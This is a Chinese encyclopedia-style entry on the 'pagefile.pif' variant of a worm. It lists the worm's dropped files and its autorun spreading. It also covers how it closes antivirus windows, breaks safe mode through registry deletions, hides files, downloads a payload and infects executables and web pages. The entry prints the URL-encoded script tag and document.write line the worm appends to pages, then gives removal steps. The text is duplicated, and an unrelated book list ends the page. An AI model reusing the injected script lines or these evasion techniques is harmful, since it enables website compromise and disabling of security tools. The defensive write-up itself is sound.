“pagefile.pif”的意思、由来-中文百科全书

技术细节

1.病毒运行后，衍生如下文件或副本：

%systemroot%\\system32\\Com\\LSASS.EXE

%systemroot%\\system32\\Com\etcfg.000

%systemroot%\\system32\\Com\etcfg.dll

%systemroot%\\system32\\Com\\SMSS.EXE

C:\\WINDOWS\\system32\\894729.log(6位随机数字)

C:\\894729.log(6位随机数字)

C:\\WINDOWS\\system32\\dnsq.dll

C:\\WINDOWS\\system32\tfsus.exe

C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\~.exe（一定不要忘记）

或C:\\Documents and Settings\\用户名\\「开始」菜单\\程序\\启动\\~.exe

各个盘下面生成pagefile.pif和autorun.inf文件，达到通过移动存储传播的目的

2.添加启动项目

C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\~.exe

3.通过查找某些ieframe和mozillauiwindowclass名关闭带有某些关键字的IE窗口和火狐浏览器窗口

dr.web

avg

木

360safe

360anti

毒霸

antivir

费尔

微点

avp.tray

kvxp

查找带有某些关键字的子窗口名称，并将其关闭

sreng 介绍

升级

还可能关闭带有某些关键字的进程

如avast

4.删除HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run下面所有启动项目

5.删除HKLM\\SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal\\

HKLM\\SYSTEM\\ControlSet001\\Control\\SafeBoot\etwork\\

HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\

HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\etwork\\

破坏安全模式

把HKU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden的值改为0x00000000

使得不能显示隐藏文件

6.查找文件名中带有360字样的文件找到即在重启后将其删除

7.通过ping百度网站查看是否联网

8.通过regsvr32.exe %systemroot%\\system32\\com\etcfg.dll /s注册netcfg.dll

9.连接网络下载http://*.com/Stop.exe到system32文件夹命名为ntfsus.exe

该病毒具有arp欺骗功能

10.感染exe文件（部分感染）且会通过自解压命令感染Rar和zip文件中的exe文件

被感染文件运行后会释放一个文件名.log的文件

11.感染htm html、asp、spx、php、jsp等网页文件在其后面加入

{script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"}{/script}的代码

感染.js文件

在其尾部加入

document.write("{ScRiPt src=''%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70''}{/sCrIpT}")

的代码

12.后台连接某些网站刷流量

清除办法：

(怕麻烦的话，可以直接使用磁碟机免疫工具

1.删除以下文件：

%systemroot%\\system32\\Com\\LSASS.EXE

%systemroot%\\system32\\Com\etcfg.000

%systemroot%\\system32\\Com\etcfg.dll

%systemroot%\\system32\\Com\\SMSS.EXE

C:\\WINDOWS\\system32\\894729.log(6位随机数字)

C:\\894729.log(6位随机数字)

C:\\WINDOWS\\system32\\dnsq.dll

C:\\WINDOWS\\system32\tfsus.exe

C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\~.exe

2.重启计算机

打开sreng：系统修复－ Windows Shell/IE 全选点击修复

双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定

点击菜单栏下方的文件夹按钮（搜索右边的按钮）

在左边的资源管理器中单击打开系统所在盘删除

C:\\pagefile.pif

c:\\autorun.inf

在左边的资源管理器中单击打开其他盘

删除pagefile.pif

autorun.inf

3.使用杀毒软件全盘杀毒修复被感染的exe文件

4.修复被感染的htm等网页文件

词条	pagefile.pif
释义	磁碟机新变种pagefile.pif，中毒后电脑突然卡或者电脑老是需要重新启动,提示"Generic host process for win32 services遇到问题需要关闭",打开任务管理器查看会发现有多个伪装的SVCHOST运行,并且有RUNDL132.EXE出现,最明显就是在D盘根目录下出现pagefile.pif和autorun.inf文件，硬盘里多了许多个pagefile.pif和autorun.inf，都是系统文件和隐藏性质。技术细节(升级破坏安全模式) 清除办法：技术细节 1.病毒运行后，衍生如下文件或副本： %systemroot%\\system32\\Com\\LSASS.EXE %systemroot%\\system32\\Com\etcfg.000 %systemroot%\\system32\\Com\etcfg.dll %systemroot%\\system32\\Com\\SMSS.EXE C:\\WINDOWS\\system32\\894729.log(6位随机数字) C:\\894729.log(6位随机数字) C:\\WINDOWS\\system32\\dnsq.dll C:\\WINDOWS\\system32\tfsus.exe C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\~.exe（一定不要忘记）或C:\\Documents and Settings\\用户名\\「开始」菜单\\程序\\启动\\~.exe 各个盘下面生成pagefile.pif和autorun.inf文件，达到通过移动存储传播的目的 2.添加启动项目 C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\~.exe 3.通过查找某些ieframe和mozillauiwindowclass名关闭带有某些关键字的IE窗口和火狐浏览器窗口 dr.web avg 木 360safe 360anti 毒霸 antivir 费尔微点 avp.tray kvxp 查找带有某些关键字的子窗口名称，并将其关闭 sreng 介绍升级还可能关闭带有某些关键字的进程如avast 4.删除HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run下面所有启动项目 5.删除HKLM\\SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal\\ HKLM\\SYSTEM\\ControlSet001\\Control\\SafeBoot\etwork\\ HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\ HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\etwork\\ 破坏安全模式把HKU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden的值改为0x00000000 使得不能显示隐藏文件 6.查找文件名中带有360字样的文件找到即在重启后将其删除 7.通过ping百度网站查看是否联网 8.通过regsvr32.exe %systemroot%\\system32\\com\etcfg.dll /s注册netcfg.dll 9.连接网络下载http://*.com/Stop.exe到system32文件夹命名为ntfsus.exe 该病毒具有arp欺骗功能 10.感染exe文件（部分感染）且会通过自解压命令感染Rar和zip文件中的exe文件被感染文件运行后会释放一个文件名.log的文件 11.感染htm html、asp、spx、php、jsp等网页文件在其后面加入 {script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"}{/script}的代码感染.js文件在其尾部加入 document.write("{ScRiPt src=''%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70''}{/sCrIpT}") 的代码 12.后台连接某些网站刷流量清除办法： (怕麻烦的话，可以直接使用磁碟机免疫工具 1.删除以下文件： %systemroot%\\system32\\Com\\LSASS.EXE %systemroot%\\system32\\Com\etcfg.000 %systemroot%\\system32\\Com\etcfg.dll %systemroot%\\system32\\Com\\SMSS.EXE C:\\WINDOWS\\system32\\894729.log(6位随机数字) C:\\894729.log(6位随机数字) C:\\WINDOWS\\system32\\dnsq.dll C:\\WINDOWS\\system32\tfsus.exe C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\~.exe 2.重启计算机打开sreng：系统修复－ Windows Shell/IE 全选点击修复双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定点击菜单栏下方的文件夹按钮（搜索右边的按钮）在左边的资源管理器中单击打开系统所在盘删除 C:\\pagefile.pif c:\\autorun.inf 在左边的资源管理器中单击打开其他盘删除pagefile.pif autorun.inf 3.使用杀毒软件全盘杀毒修复被感染的exe文件 4.修复被感染的htm等网页文件
随便看	建筑防晒涂料建筑防水材料建筑防水材料标准汇编建筑防水材料标准汇编：试验方法及施工技术卷建筑防水材料生产工艺与配方精选建筑防水材料试验建筑防水材料与施工建筑防水工程技术规范建筑防水工程设计建筑防水工程渗漏实例分析建筑防水工程师手册建筑防水工程施工建筑防水工程施工工艺标准建筑防水工程施工技术交底记录详解建筑防水工程施工新技术典型案例与分析建筑防水工程施工质量问答建筑防水工程实用材料手册建筑防水工程手册建筑防水工程问答实录建筑防水工程专业承包企业资质等级标准建筑防水卷材产品生产许可相关标准汇编建筑防水卷材试验方法建筑防水模板建筑防水设计与施工手册建筑防水施工问答